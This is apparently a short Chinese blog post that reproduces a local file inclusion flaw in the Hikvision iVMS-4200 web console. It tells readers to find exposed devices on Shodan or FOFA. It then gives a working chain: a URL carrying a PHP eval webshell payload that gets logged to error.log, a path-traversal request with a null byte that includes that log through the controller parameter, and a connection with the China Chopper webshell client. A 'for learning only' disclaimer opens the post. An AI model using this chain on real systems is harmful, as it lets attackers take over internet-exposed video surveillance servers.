Hikvision iVMS 4200 /index.php 本地檔案包含漏洞復現
阿新 • • 發佈:2020-10-15
宣告
本文內容僅供學習交流使用,請勿利用文章內的相關技術從事非法測試,如因此產生的一切不良後果與文章作者無關。
一、漏洞介紹
iVMS-4200適用於嵌入式網路硬碟錄影機、混合型網路硬碟錄影機、網路視訊伺服器、NVR、IP Camera和解碼裝置以及視音訊編解碼卡,支援實時預覽、遠端回放和下載、資源管理、遠端配置、使用者管理、系統配置等多種功能。
簡單來說,它包含了一個WEB版的控制檯,用到了一個比較小眾的框架
,然後被這個Xphp的框架賣了。
漏洞出現在
controller引數的一個任意檔案包含。
二、查詢裝置
利用shodan、FOFA等查詢iVMS-4200的裝置
三、漏洞復現
1、首先構造URL訪問,使其記錄在error.log中
http://xxx.xxx.xxx.xxx:xx/<?eval($_POST['pass'])?>
2、直接包含這個客戶端自帶的Nginx日誌檔案
http://xxx.xxx.xxx.xxx:xx/index.php?controller=../../../../Server/logs/error.log%00.php
(此處不截圖,自行測試檢視)
3、中國菜刀連線